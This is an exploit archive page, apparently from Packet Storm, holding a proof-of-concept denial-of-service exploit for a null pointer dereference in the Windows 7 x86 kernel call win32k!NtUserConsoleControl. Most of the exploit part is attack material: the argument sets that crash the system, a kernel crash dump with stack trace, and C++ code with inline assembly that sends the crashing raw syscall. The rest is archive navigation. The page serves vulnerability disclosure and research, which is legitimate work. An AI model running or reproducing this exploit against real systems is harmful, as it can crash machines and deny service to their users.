what you don't know can hurt you

Microsoft Windows Kernel win32k!NtUserConsoleControl Denial Of Service

Microsoft Windows Kernel win32k!NtUserConsoleControl Denial Of Service
Posted Jul 30, 2018
Authored by Victor Portal Gonzalez

Microsoft Windows Kernel win32k!NtUserConsoleControl denial of service proof of concept exploit.

tags | exploit, denial of service, kernel, proof of concept
systems | windows
MD5 | baeebc065565ab91d6585025b4f98177

Microsoft Windows Kernel win32k!NtUserConsoleControl Denial Of Service

Change Mirror Download
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A

# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:

# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).

# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]

# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope

# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_

# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641

# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766

# PoC code:

#include <Windows.h>

extern "C"

ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}


int _tmain(int argc, _TCHAR* argv[])
{

int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7

LoadLibrary(L"user32.dll");

st = (int)SystemCall32(syscall_ID, 4, 0, 8);

return 0;
}

# The vulnerability has only been tested in Windows 7 x86.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close